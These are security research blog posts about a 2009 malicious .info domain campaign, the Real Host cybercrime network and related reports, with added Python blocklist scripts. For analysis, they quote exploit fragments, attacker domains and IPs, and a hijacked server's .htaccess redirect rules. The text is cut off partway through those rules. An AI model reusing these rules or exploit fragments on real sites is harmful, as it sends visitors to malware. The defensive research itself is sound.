Major Stealthy Malware Campaign – 711 Domains Taken Down

Starting sometime around November 6th, many attacks were observed coming from strangely named domains such as us.bf9.info, us.bp0.info and us.bn3.info. The attackers used code splitting to make their scripts stealthier: the suspicious shellcode was moved out of the primary exploit script into a secondary script, so the landing page on its own gives a scanner little to trigger on. The attacks were delivered through advertisements, which also made investigating the source a pain. Searches on the domains surprisingly yielded nothing from the usual sources such as malwareurl, malwaredomainlist and McAfee SiteAdvisor.

To get to the root of the problem, Afilias (the registry for .info) and GoDaddy (the registrar) were brought in to investigate. They blocked the offending domains as soon as it was clear they were hostile. The end result was the real surprise: GoDaddy removed 711 domains affiliated with this attack!

Attack scripts:

hxxp://us.hn0.info/f/1/ie.html

http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372

hxxp://us.hn0.info/f/1/ff.html

http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360

hxxp://us.hn0.info/f/1/cosplay.swf
http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&type=swf

Shellcode:
http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262

The domains:

FK0.INFO AC0.INFO KD8.INFO JZ5.INFO
FK6.INFO AE0.INFO KD9.INFO JZ6.INFO
FK7.INFO AE6.INFO CUUB.INFO JZ7.INFO
FK8.INFO AE9.INFO CXXB.INFO JZ8.INFO
FK9.INFO AF0.INFO DRRB.INFO KA0.INFO
FL0.INFO AF5.INFO DTTB.INFO KB0.INFO
FL7.INFO AF8.INFO DYYB.INFO KB8.INFO
FL8.INFO AF9.INFO GJGJ.INFO KC5.INFO
FM0.INFO AG0.INFO RFVT.INFO KC6.INFO
FM9.INFO AG7.INFO TGBY.INFO KC8.INFO
FN3.INFO AG8.INFO UJMI.INFO KD3.INFO
FN4.INFO AG9.INFO YHNU.INFO KD4.INFO
FN5.INFO AH0.INFO DT0.INFO KD7.INFO
FN6.INFO AH5.INFO DV0.INFO HX0.INFO
FN7.INFO AH7.INFO DV6.INFO HY2.INFO
FN8.INFO AI0.INFO DV7.INFO HY3.INFO
FO0.INFO AJ3.INFO DW0.INFO HY6.INFO
FO5.INFO AJ4.INFO DW9.INFO HY7.INFO
FO6.INFO AJ5.INFO DX6.INFO HZ0.INFO
FO7.INFO AJ7.INFO DX7.INFO HZ3.INFO
FP4.INFO AJ9.INFO DX8.INFO HZ4.INFO
FP5.INFO AK0.INFO DY2.INFO HZ5.INFO
FP9.INFO AN0.INFO DY5.INFO HZ7.INFO
FQ0.INFO AO0.INFO DZ4.INFO HZ8.INFO
FQ3.INFO AO3.INFO DZ5.INFO IA0.INFO
FQ4.INFO AO8.INFO EA0.INFO IB0.INFO
FQ6.INFO AP3.INFO EA2.INFO IB4.INFO
FQ7.INFO AP9.INFO EA4.INFO IB5.INFO
FR0.INFO AQ0.INFO EA5.INFO IB6.INFO
FS0.INFO AQ3.INFO EA6.INFO IB7.INFO
FS4.INFO AQ9.INFO EA7.INFO IB8.INFO
FS6.INFO AR0.INFO EA8.INFO IB9.INFO
FS7.INFO AT4.INFO EB0.INFO IC5.INFO
FT0.INFO AU0.INFO EB4.INFO IF4.INFO
FT5.INFO AW0.INFO ED0.INFO IF5.INFO
FT9.INFO AX0.INFO ED3.INFO IF6.INFO
FU0.INFO AX3.INFO EF2.INFO IF7.INFO
FU4.INFO AY0.INFO EH4.INFO IF8.INFO
FU8.INFO AZ5.INFO EH7.INFO IF9.INFO
FV4.INFO AZ6.INFO EI4.INFO IG5.INFO
FV6.INFO AZ7.INFO EI5.INFO IG6.INFO
FV7.INFO AZ8.INFO EI6.INFO IG9.INFO
FV8.INFO AZ9.INFO EI8.INFO IH0.INFO
FV9.INFO BC0.INFO EI9.INFO IH2.INFO
FW0.INFO BC6.INFO EK0.INFO IH3.INFO
FW5.INFO BC8.INFO EK2.INFO IH4.INFO
FW6.INFO BC9.INFO EK4.INFO IH5.INFO
FW8.INFO BD3.INFO EK5.INFO IH6.INFO
FW9.INFO BF0.INFO EK7.INFO IJ2.INFO
FY0.INFO BF4.INFO EL0.INFO IJ4.INFO
FY2.INFO BF6.INFO EL6.INFO IJ5.INFO
FY5.INFO BF8.INFO EM5.INFO IJ6.INFO
FY6.INFO BF9.INFO EM8.INFO IJ7.INFO
FZ0.INFO BG0.INFO EM9.INFO IK3.INFO
FZ3.INFO BH0.INFO EN8.INFO IK4.INFO
FZ4.INFO BH2.INFO EO0.INFO IK5.INFO
FZ5.INFO BI6.INFO EO3.INFO IK6.INFO
FZ7.INFO BI7.INFO EO5.INFO IK7.INFO
FZ8.INFO BJ4.INFO EO6.INFO IK8.INFO
GB0.INFO BK2.INFO EO7.INFO IK9.INFO
GC0.INFO BL0.INFO EO8.INFO IL0.INFO
GC6.INFO BL8.INFO EO9.INFO IL7.INFO
GC7.INFO BL9.INFO EP6.INFO IL8.INFO
GC8.INFO BM3.INFO EP7.INFO IO2.INFO
GC9.INFO BM5.INFO EP8.INFO IO3.INFO
GD0.INFO BM8.INFO EQ4.INFO IO5.INFO
GD4.INFO BN0.INFO EQ7.INFO IO6.INFO
GD5.INFO BN3.INFO ER9.INFO IQ9.INFO
GD6.INFO BN5.INFO ES7.INFO IR0.INFO
GD7.INFO BN7.INFO ES8.INFO IR6.INFO
GD8.INFO BN8.INFO ES9.INFO IR7.INFO
GF3.INFO BP0.INFO EU0.INFO IR9.INFO
GH4.INFO BP5.INFO EV9.INFO IU0.INFO
GH5.INFO BP6.INFO EW0.INFO IU2.INFO
GH6.INFO BP7.INFO EW4.INFO IV2.INFO
GH7.INFO BP8.INFO EY0.INFO IV4.INFO
GI0.INFO BQ0.INFO EZ0.INFO IV5.INFO
GI3.INFO BQ2.INFO EZ9.INFO IV6.INFO
GI6.INFO BQ3.INFO FA0.INFO IW0.INFO
GI8.INFO BQ4.INFO FC0.INFO IW2.INFO
GJ0.INFO BQ5.INFO FC5.INFO IW4.INFO
GJ7.INFO BQ6.INFO FC7.INFO IW5.INFO
GJ8.INFO BQ7.INFO FC9.INFO IW6.INFO
GJ9.INFO BQ8.INFO FD0.INFO IX4.INFO
GK0.INFO BQ9.INFO FD5.INFO IX5.INFO
GK3.INFO BR5.INFO FD8.INFO IX6.INFO
GK5.INFO BR6.INFO FD9.INFO IX7.INFO
GK6.INFO BR7.INFO FE0.INFO IY0.INFO
GK8.INFO BR9.INFO FE4.INFO IY2.INFO
GL3.INFO BS3.INFO FE7.INFO IY3.INFO
GL4.INFO BS5.INFO FG0.INFO IY4.INFO
GL9.INFO BT0.INFO FG3.INFO IY6.INFO
GM8.INFO BU0.INFO FG5.INFO IY8.INFO
GM9.INFO BU9.INFO FG8.INFO IY9.INFO
GN0.INFO BV0.INFO FH0.INFO IZ0.INFO
GN5.INFO BV2.INFO FH4.INFO IZ2.INFO
GN6.INFO BV5.INFO FH5.INFO IZ3.INFO
GN7.INFO BV7.INFO FH6.INFO IZ7.INFO
GN9.INFO BV8.INFO FH7.INFO IZ8.INFO
GP8.INFO BV9.INFO FH8.INFO IZ9.INFO
BX2.INFO WGREATDREAM.COM FH9.INFO JA0.INFO
BX7.INFO GP0.INFO FI4.INFO JB0.INFO
BX9.INFO GQ0.INFO FJ0.INFO JC2.INFO
BY5.INFO GQ2.INFO FJ2.INFO JC5.INFO
BZ9.INFO GQ3.INFO FJ3.INFO JC6.INFO
CB0.INFO GQ4.INFO FJ4.INFO JD2.INFO
CB6.INFO GQ5.INFO FJ5.INFO JD3.INFO
CE3.INFO GQ9.INFO FJ6.INFO JD4.INFO
CE7.INFO GR6.INFO FJ7.INFO KE2.INFO
CF0.INFO GR9.INFO FJ8.INFO KF3.INFO
CF3.INFO GS0.INFO FJ9.INFO KF4.INFO
CF4.INFO GS3.INFO FK2.INFO KF5.INFO
CF5.INFO GS6.INFO JD0.INFO KF7.INFO
CF6.INFO GS9.INFO JD6.INFO
CF7.INFO GU0.INFO JD7.INFO
CG3.INFO GU4.INFO JD9.INFO
CI0.INFO GV0.INFO JE2.INFO
CJ0.INFO GV2.INFO JE4.INFO
CJ3.INFO GV3.INFO JF0.INFO
CJ8.INFO GV4.INFO JF2.INFO
CL0.INFO GV5.INFO JF3.INFO
CL5.INFO GV9.INFO JG0.INFO
CL9.INFO GW0.INFO JG2.INFO
CM9.INFO GX0.INFO JG3.INFO
CO0.INFO GX2.INFO JG7.INFO
CP0.INFO GX4.INFO JG8.INFO
CP5.INFO GX5.INFO JG9.INFO
CP7.INFO GX6.INFO JH0.INFO
CQ0.INFO GY0.INFO JH4.INFO
CQ5.INFO GY2.INFO JH5.INFO
CQ7.INFO GY4.INFO JH7.INFO
CQ8.INFO GY5.INFO JI0.INFO
CQ9.INFO GY6.INFO JI1.INFO
CS0.INFO GY7.INFO JI2.INFO
CS7.INFO GY9.INFO JI7.INFO
CT0.INFO HB7.INFO JI9.INFO
CT6.INFO HB8.INFO JK7.INFO
CT8.INFO HC0.INFO JK8.INFO
CU3.INFO HC4.INFO JL2.INFO
CU4.INFO HC8.INFO JL3.INFO
CU5.INFO HD0.INFO JL4.INFO
CV0.INFO HE4.INFO JL5.INFO
CV8.INFO HE5.INFO JL7.INFO
CV9.INFO HE7.INFO JL9.INFO
CW0.INFO HF0.INFO JM0.INFO
CW4.INFO HF6.INFO JM3.INFO
CW5.INFO HF7.INFO JM6.INFO
CW8.INFO HF8.INFO JM7.INFO
CW9.INFO HF9.INFO JN2.INFO
CX0.INFO HG3.INFO JN7.INFO
CX5.INFO HG4.INFO JN8.INFO
CX6.INFO HG5.INFO JN9.INFO
CY2.INFO HG6.INFO JO0.INFO
CY3.INFO HG8.INFO JQ1.INFO
CY6.INFO HG9.INFO JQ2.INFO
CY7.INFO HJ2.INFO JQ3.INFO
CZ0.INFO HJ3.INFO JQ4.INFO
CZ7.INFO HJ5.INFO JQ5.INFO
CZ9.INFO HJ6.INFO JQ6.INFO
DA3.INFO HJ7.INFO JQ7.INFO
DA6.INFO HJ8.INFO JQ8.INFO
DA7.INFO HJ9.INFO JR0.INFO
DB5.INFO HK0.INFO JS3.INFO
DB6.INFO HK3.INFO JS4.INFO
DE4.INFO HK4.INFO JS5.INFO
DE5.INFO HL0.INFO JS8.INFO
DE6.INFO HL6.INFO JS9.INFO
DE8.INFO HL9.INFO JT0.INFO
DF5.INFO HM4.INFO JT3.INFO
DF6.INFO HN0.INFO JT4.INFO
DG0.INFO HN3.INFO JT5.INFO
DH3.INFO HN4.INFO JT9.INFO
DH9.INFO HN5.INFO JU0.INFO
DI0.INFO HN6.INFO JU2.INFO
DI3.INFO HN9.INFO JV0.INFO
DI4.INFO HO0.INFO JV3.INFO
DI8.INFO HP0.INFO JV4.INFO
DJ3.INFO HR6.INFO JV5.INFO
DJ7.INFO HS0.INFO JV6.INFO
DK0.INFO HS7.INFO JV8.INFO
DK5.INFO HS8.INFO JW4.INFO
DK7.INFO HS9.INFO JW7.INFO
DK8.INFO HT6.INFO JW8.INFO
DL0.INFO HU0.INFO JW9.INFO
DM0.INFO HU3.INFO JX1.INFO
DM4.INFO HU4.INFO JX2.INFO
DP0.INFO HU6.INFO JX3.INFO
DP3.INFO HU7.INFO JX5.INFO
DP6.INFO HV0.INFO JX8.INFO
DP7.INFO HW4.INFO JY0.INFO
DQ0.INFO HW6.INFO JY2.INFO
DQ2.INFO HW7.INFO JY4.INFO
DR0.INFO HW8.INFO JY5.INFO
DS7.INFO HX3.INFO JY6.INFO
DT3.INFO HX5.INFO JY7.INFO
DT5.INFO HX6.INFO JY9.INFO
DT6.INFO HX7.INFO JZ2.INFO
DT7.INFO HX9.INFO JZ3.INFO
DT8.INFO KD0.INFO JZ4.INFO
DT9.INFO
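As an added example that is not part of the original post, the script below turns the listing above into a blocklist and also flags hostnames that fit the campaign's naming scheme (two letters and a digit directly under .info, optionally with a prefix such as us.) even when they are not on the list. The blocklist excerpt is a handful of entries copied from the list above, the DNS log lines are constructed for the example, and cdn.ab1.info is a hypothetical name that is not in the list.

```python
import re

# Excerpt of the published domain list above (the full list has 711 entries;
# paste the whole block in place of this string for real use).
DOMAIN_LIST = """
FK0.INFO AC0.INFO KD8.INFO JZ5.INFO
BF9.INFO BG0.INFO EM9.INFO IK3.INFO
HN0.INFO HN3.INFO JT4.INFO JT5.INFO
BP0.INFO BN3.INFO CUUB.INFO RFVT.INFO
BX2.INFO WGREATDREAM.COM FH9.INFO JA0.INFO
"""

# Naming scheme seen in the campaign: two letters + one digit directly under
# .info (bf9.info, hn0.info, ...), optionally prefixed by labels such as "us.".
# The few four-letter .info names (cuub.info, rfvt.info, ...) do not fit it and
# rely on the explicit list.
CAMPAIGN_PATTERN = re.compile(r"^(?:[a-z0-9-]+\.)*[a-z]{2}[0-9]\.info$")


def load_blocklist(text):
    """Parse the whitespace-separated, multi-column listing into lowercase domains."""
    return {token.lower() for token in text.split() if "." in token}


def classify_host(host, blocklist):
    """'listed' if the host or any parent domain is on the list, 'pattern' if it
    merely matches the campaign naming scheme, otherwise 'clean'."""
    host = host.lower().rstrip(".")
    labels = host.split(".")
    for i in range(len(labels) - 1):           # walk up: us.bf9.info, bf9.info
        if ".".join(labels[i:]) in blocklist:
            return "listed"
    if CAMPAIGN_PATTERN.match(host):
        return "pattern"
    return "clean"


def triage_dns_log(lines, blocklist):
    """Return (client, qname, verdict) for every query that is not clean.
    Expected (constructed) line format: '<timestamp> <client-ip> <qname>'."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        verdict = classify_host(parts[2], blocklist)
        if verdict != "clean":
            hits.append((parts[1], parts[2].lower().rstrip("."), verdict))
    return hits


# Constructed sample DNS log lines for the example.
SAMPLE_LOG = [
    "2009-11-07T10:01:02Z 10.0.0.5 us.bf9.info.",
    "2009-11-07T10:01:03Z 10.0.0.5 www.example.info.",
    "2009-11-07T10:01:09Z 10.0.0.7 us.hn0.info.",
    "2009-11-07T10:02:11Z 10.0.0.9 cdn.ab1.info.",   # hypothetical, not on the list
    "2009-11-07T10:02:15Z 10.0.0.9 rfvt.info.",
    "2009-11-07T10:03:00Z 10.0.0.12 www.google.com.",
]

if __name__ == "__main__":
    for hit in triage_dns_log(SAMPLE_LOG, load_blocklist(DOMAIN_LIST)):
        print(*hit)
```

The pattern match is deliberately reported separately from a list hit: a "pattern" verdict on a name that is not on the list is a lead to investigate, not proof, since a legitimate three-character .info domain will match it too.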

Introducing MalFI – Another Report From HostExploit

I’m a few days late for posting this but the HostExploit team has produced another report, this time on an attack dubbed “MalFI” for malicious file inclusion. This encompasses remote file inclusion (RFI), local file inclusion (LFI) and Cross Server Attack (XSA). The report had been in the works for quite some time and while I was not a main author this time, Jart Armin and Scott Logan worked with me to interpret and use my honeypot data that I’ve been collecting over the last several months.

Rather than rehash the purpose for the report, here’s an excerpt from the abstract:

MALfi “A Silent Threat”

What is it all about, MALfi? A blended threat currently detected on around 350,000 websites &
Internet servers. One major purpose is to establish, “use once and throw away” disposable
botnets for spam, phishing, DDoS and exploits.
Full Report (public version) download PDF – hostexploit Download page = http://bit.ly/eoO4C

Abstract / Press Release

MALfi is a holistic and descriptive term applied to adequately describe the recent blended attack
utilized by hackers and cyber criminals to compromise websites and servers. This is a
combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack),
and RCE (remote code execution).

Conservative estimates over recent months indicate around 350,000 affected websites and
servers worldwide. hostexploit and associated researchers have tracked 103,351 attacks,
involving 2,743 unique IP addresses, with 85 countries involved in RFI scanning and 911 ASNs
involved.

Check out the report for our research and findings. A more detailed version will also be made available to key members of the security and law enforcement communities.


Recruiting Chinese Attackers

With all the talk about Chinese malware authors and groups of attackers supposedly sponsored by governments out there, I thought I would publish a find of mine from back in 2007. Excellent research has been done on this topic with one of the most interesting events being the discovery of GhostNet.

The following message was discovered in a HTML comment section inside a hostile script. I found the page hosting the script by searching for a string inside an ANI exploit on Google in May 2007.

天高云淡,正宜一马奔腾,青春年少,我自纵横驰骋,这是一个只承认强者的时代,然而学习正是赋予了我们作强者的资本,物竟天择,适者生存,只有不断的学习我们才不会被社所会淘汰,我们才会逐渐变强,珍惜你生命中的每一分钟无学习,你会发现平凡的你一样很优秀,当你在风烛残年的那一刻时,面对你的朋友,爱人,儿子,不会因碌碌无为而羞耻,不会因年华虚度而悔恨,你会发现当你,把你的你的青春变的更加劲直和充满活力的时候,曾经无奈与迷茫的你,现在是那样的精彩与辉煌黑域战盟一个,和平,博爱,互助,不会有任何的技术歧视的技术团体,诚心邀请您的加盟楚蓝枫QQ4998XXXXX

This translates to:

It is a clear day, suitable for horse gallops.  The youth is young; he can advance freely and quickly.

This is the era which appreciates only the strong, the survival of the fittest; yet study is the capital which empowers us to become strong. Only through continuous learning will we avoid being eliminated and become stronger and stronger. Cherish every minute of life with learning and you will find yourself as extraordinary as others. When you are old, facing your friends, wife and son, you will feel no shame or regret, because you did not waste your youth; you will see how wonderful you were when you put your vibrant youth into something meaningful and changed from the once helpless and confused you into someone brilliant. Black Domain War Alliance (黑域战盟), a peaceful, fraternal, mutually supportive technical group with no technical snobbery of any kind, sincerely invites you to join. Chu Lanfeng (楚蓝枫), QQ4998XXXXX

Interesting message they were trying to get across isn’t it? :)


SPAM Briefly Drops 38% Due To Real Host Shutdown

MessageLabs wrote a nice report summarizing key events from August and it turns out our work was more widely felt than believed. Apparently part of Cutwail’s C&C infrastructure resided inside Real Host’s network. When they got cut off, SPAM levels dropped but only briefly since there were more C&Cs elsewhere to pick up the slack.

Here's an excerpt from the report; too bad they didn't credit our work :)

“Real Host was disconnected by its upstream providers on 1 August 2009. The impact was immediately felt, as can be seen in Figure 1, where spam volumes dropped briefly by as much as 38% in the subsequent 48-hour period.

Much of this spam was linked to the Cutwail botnet, currently one of the largest botnets and responsible for approximately 15-20% of all spam. Its activity levels fell by as much as 90% when Real Host was taken offline, but quickly recovered in a matter of days.”


Real Host now shutdown

Now that the report has hit mainstream media outlets, I am pleased to report that Real Host has been taken down. Score another one for the good guys!

The story was first published by the Financial Times of London

With follow up stories from:

Network World

The Inquirer

CIO Magazine

Information Security Magazine

Sunbelt Software

Computer World UK

And many more!


Real Host, Latvia – RBN Resurgence or Clone

A couple of days ago I was investigating an attack that a reader submitted to me that was related to the recent nine ball attacks as reported by WebSense. (Part 1 | Part 2)

The attackers use the same techniques to exploit victims but have moved to new domains and updated their payloads. Two payloads are dropped on compromised hosts at the end of the attack chain: one steals banking credentials and the other sends spam. They are delivered by multiple exploits, including one still-unpatched zero-day (Office Web Components) and one that was a zero-day until Microsoft patched it recently (DirectShow, MS09-028).

Directshow – MS09-028 (previously a 0day, patched recently)

function directshow()
{
    // shellcode string truncated here in the captured script
    var shellcode=unescape("%uC033...

    obj.data='./directshow.php';
    obj.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

Microsoft Office Web Components (unpatched 0day)

function spreadsheet()
{
    try
    {
        var objspread=new ActiveXObject('OWC10.Spreadsheet');
    }

After conducting further research on 71speed.info and finding it hosted by Real Host Ltd of Latvia, it quickly became apparent how bad this host is. A quick search leads to a blog by Dynamoo where this host's activities were first uncovered. Delving deeper into the provider, it is apparent that they are a major hub of cybercrime activity, which we discuss further below. This post was prepared in conjunction with Jart Armin of HostExploit.com. Jart will present a higher-level view of Real Host's activities in relation to other entities and, most interestingly, how they relate to the former Russian Business Network (RBN).

It should be noted that many of these sites are no longer reachable due to swift efforts by registrar Directi.

Observed Hostile Activity:

  • Exploits including unpatched (or soon to be patched) 0days
  • Payloads to drop on victim PCs including: fake codecs, banking trojans, spambots, fake anti virus, downloaders and even a Mac trojan
  • Phishing sites
  • Moneymule recruitment sites
  • Botnet Command and Control servers
  • Hosting of cybercrime websites – Iframe programs
  • Distributing pirated commercial software (warez)

Real Host has three /28 blocks (48 IPs in total) allocated from Junik (AS8206):

inetnum: 213.182.197.0 – 213.182.197.15
netname: Real_Host_NET3
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.224 – 213.182.197.239
netname: Real_Host_NET1
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.240 – 213.182.197.255
netname: Real_Host_NET2
descr: Real Host
country: LV
abuse-mailbox: abusemailhost@gmail.com

The first indication of suspicious activity is the use of Gmail addresses as abuse contacts, rather than mailboxes in the provider's own domain.

Next, here is data from my security tools showing attacks and the dates associated with them:

Date | IP | Domain | URL | Purpose
5/6/2009 | 213.182.197.230 | update.dom11z.cn | / | Multiple Exploits
6/2/2009 | 213.182.197.227 | test.corbsc.com | /splt/getpdf.php | Multiple Exploits
6/4/2009 | 213.182.197.229 | 2k90.cn | /2/include/spl.php | Multiple Exploits
6/5/2009 | 213.182.197.229 | 2k90.cn | /2/include/spl.php | Multiple Exploits
6/10/2009 | 213.182.197.237 | downloadoemsoftware.com | /exempl/include/spl.php | Multiple Exploits
6/15/2009 | 213.182.197.237 | downloadoemsoftware.com | /exempl/include/spl.php | Multiple Exploits
7/10/2009 | 213.182.197.237 | noplit.ws | /exempl/include/spl.php | Multiple Exploits
7/10/2009 | 213.182.197.229 | businessconsulting312.com | /bus_trf/1/pdf.php | Multiple Exploits
7/10/2009 | 213.182.197.229 | businessconsulting312.com | /bus_trf/1/pdf.php | Multiple Exploits
5/6/2009 | 213.182.197.23 | lieliteautobody.cn | /load.php | Payloads
5/6/2009 | 213.182.197.23 | lieliteautobody.cn | /load.php | Payloads
6/2/2009 | 213.182.197.227 | test.corbsc.com | /splt/getexe.php | Payloads
6/6/2009 | 213.182.197.5 | virus-detect-soft.com | /antivirus.exe | Payloads
6/6/2009 | 213.182.197.5 | virus-detect-soft.com | /antivirus.exe | Payloads
6/10/2009 | 213.182.197.237 | downloadoemsoftware.com | /exempl/load.php | Payloads
7/18/2009 | 213.182.197.237 | 5fgh.ws | /expli/update.php | Payloads
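As an added example that is not part of the original post, the script below parses the three inetnum records quoted above into CIDR networks, checks the IPs from the tables in this post against them, and flags matching destinations in a constructed proxy log. Running the check shows that two of the observed IPs (213.182.197.20 and 213.182.197.23) fall outside the three listed /28 blocks, so a blocklist derived from the inetnum records alone would miss part of this activity; whether to block the surrounding Junik space instead is a judgement call the records themselves do not answer.

```python
import ipaddress
import re

# The three inetnum records quoted above (RIPE whois format).
INETNUM_RECORDS = """
inetnum: 213.182.197.0 - 213.182.197.15
netname: Real_Host_NET3
inetnum: 213.182.197.224 - 213.182.197.239
netname: Real_Host_NET1
inetnum: 213.182.197.240 - 213.182.197.255
netname: Real_Host_NET2
"""

# Every IP that appears in the two tables in this post.
OBSERVED_IPS = [
    "213.182.197.230", "213.182.197.227", "213.182.197.229", "213.182.197.237",
    "213.182.197.23", "213.182.197.5", "213.182.197.249", "213.182.197.251",
    "213.182.197.13", "213.182.197.236", "213.182.197.8", "213.182.197.14",
    "213.182.197.228", "213.182.197.20", "213.182.197.235", "213.182.197.10",
]

INETNUM_RE = re.compile(r"^inetnum:\s*([\d.]+)\s*-\s*([\d.]+)", re.M)


def parse_inetnums(text):
    """Turn 'inetnum: first - last' lines into a list of CIDR networks."""
    nets = []
    for first, last in INETNUM_RE.findall(text):
        nets.extend(ipaddress.summarize_address_range(
            ipaddress.ip_address(first), ipaddress.ip_address(last)))
    return nets


def in_netblocks(ip, nets):
    """True if ip lies in any of the networks; non-IP strings are never a match."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in nets)


def uncovered(ips, nets):
    """Observed IPs that the allocation records do not cover, in address order."""
    return sorted((ip for ip in ips if not in_netblocks(ip, nets)),
                  key=ipaddress.ip_address)


def flag_proxy_log(lines, nets):
    """Return lines whose destination IP (4th field in the constructed format)
    sits inside the netblocks."""
    return [line for line in lines
            if len(line.split()) >= 4 and in_netblocks(line.split()[3], nets)]


# Constructed proxy log lines: '<date> <time> <client> <dest-ip> <method> <url>'.
SAMPLE_PROXY_LOG = [
    "2009-07-10 10:12:01 10.1.1.20 213.182.197.229 GET http://businessconsulting312.com/bus_trf/1/pdf.php",
    "2009-07-10 10:12:05 10.1.1.20 93.184.216.34 GET http://www.example.com/",
    "2009-07-18 09:00:44 10.1.1.31 213.182.197.237 GET http://5fgh.ws/expli/update.php",
]

if __name__ == "__main__":
    nets = parse_inetnums(INETNUM_RECORDS)
    print("netblocks:", [str(n) for n in nets])
    print("observed IPs outside them:", uncovered(OBSERVED_IPS, nets))
    for line in flag_proxy_log(SAMPLE_PROXY_LOG, nets):
        print("flagged:", line)
```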

A little manual investigation led me to the following:

IP | Domain | Purpose
213.182.197.229 | yourgoogleanalytics.us | Money mule recruiting
213.182.197.229 | barwellsgroup.cn | Money mule recruiting (related to yourgoogleanalytics.us)
213.182.197.249 | vikd3jj-3.com | Malware
213.182.197.251 | 2k90.cn | Malware
213.182.197.13 | mac-videos.com | Mac trojan
213.182.197.236 | 71speed.info | Leads to banking trojan (SilentBanker) and spambot
213.182.197.8 | bestxvids.info | Zlob
213.182.197.249 | traffic-searches.cn | Botnet C&C
213.182.197.237 | 1gigabayt.com | Zeus C&C
213.182.197.14 | iframepartners.com | Iframe sellers
213.182.197.228 | chlenopopik.com | Zeus C&C
213.182.197.14 | megavipsite.cn | Malware
213.182.197.20 | traffcount.cn | Malware
213.182.197.229 | newskyag.com | Money mule recruiting; Zeus C&C
213.182.197.235 | traffic-exchange.ru | Part of iframe redirection service
213.182.197.10 | vlkontacte.ru | Russian social network phish
213.182.197.251 | botnet.su | Zeus C&C

The domain I found most amusing was botnet.su, the attackers clearly aren’t trying to hide their motives on this one! This domain was previously used by the RBN along with NewskyAG and others. More on this link can be found at hostexploit.com.

Zeus seems to be one of the most common threats being hosted from Real Host’s network. According to recent information released by Damballa, Zeus is the #1 botnet in the US with an estimated 3.6 million PCs compromised.

To begin, let's look at the money mule sites, the Barwells Group and NewskyAG. Here is an excerpt from the Barwells job pitch:

BarwellsGroup

“During the trial period (1 month), you will be paid 2000 USD per month
while working on average 3 hours per day, Monday-Friday, plus 5
commission from every transactions or task received and processed. The
salary will be sent in the form of wire transfer directly to your
account. After the trial period your base pay salary will go up to
3,500USD per month, plus 5 commission.”

Clearly this is a money mule recruitment program. Sounds pretty good for 3 hours work per day, maybe I should quit my day job!

NewskyAG

Not only does this domain operate a money mule scam, it also ran a Zeus C&C server. What is scary is that people actually fall prey to this scheme as shown by this quote from yahoo answers:

Q: “Anyone ever heard of a company called NewSky Ag?”

A: “Yes I work for them from home and so far everything is ok but I’ve only been doing it about 2 months so if you have any more ? please let me know”

Next we have a phish for a Russian social networking site:

[screenshot: phishing page at vlkontacte.ru imitating the Russian social network VKontakte]

Lastly, let's look at iframepartners.com. The site is currently down, but information is still available. It pays malicious web admins to place iframes on the websites they have compromised. A colleague of mine kindly translated the text from Russian (thanks, Alex!). It reads:

1. A partner pays for iframe traffic, we accept only us, gb, it, au, and it will be in average from $1 to $20 for 1K depending on traffic quality

2. We accept only ads that generate more than 50K USA traffic

3. You are prohibited to install anything else with our iframe

4. Adult traffic is not welcomed

5. An account will be deleted without payout in case of detection of spam or worm traffic

6. We have been deleting accounts that are not active for few days

7. Cheaters and hit-botters, please don't waste our time, look for other places

8. Payout twice a month, in the beginning and in the middle of month
Use XXX XXXXXX to contact us

Notice how adult sites, worms and spam traffic are not allowed? This is probably because they are very noisy and easily spotted by security professionals, which would draw attention to the iframe traffic the operators want to keep quiet.

This leads to another site called installing.cc, which pays for installing malware onto compromised PCs.

[screenshot: installing.cc pay-per-install offer]

Another interesting hit comes from a design company, web-alfa.com, which designed an eye-catching Flash banner advertisement for the attackers.

[image: Flash banner advertisement for Real Host, designed by web-alfa.com]

The slides in the flash movie say:

Long-live substitution,

And software sale,

Referral system,

And other life enjoyments

For invitation and detailed information contact us via XXX XXXXXX

Clearly Real Host Ltd is hosting major cybercrime activity as a vast number of IPs in their space host malicious content. Several of the domains hosted with them were used by the former RBN. Real Host represents a major threat to individuals, business and the safety of the Internet ecosystem.


Nine-Ball followup now with video! Part 2

As a follow up to my previous post, here is the next video depicting the second portion of the attack. For URLs, Virustotal results, etc refer back to Part 1. All analysis is conducted with Malzilla.

To give you some additional insight into the attack, I am also able to share the contents of a hacked server’s .htaccess file. The miscreants upload this file to automatically redirect visitors to a site under their control.

These lines send every request that would produce a 400, 401, 403, 404 or 500 response to ake.kz, the attacker-controlled site. Because the ErrorDocument target is a full URL rather than a local path, Apache answers with a redirect instead of serving an error page, so any mistyped or missing URL on the victim site hands the visitor straight to the attacker.

ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

The following entries check whether the visitor reached the compromised website from a search engine, by matching the Referer header against a list of search engine names (the loose `.*search.*` pattern catches most of the rest). If so, the visitor is forwarded with a 301 to ake.kz. Visitors who type the address directly, including the site owner, still see the normal site, which is what keeps the compromise unnoticed.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
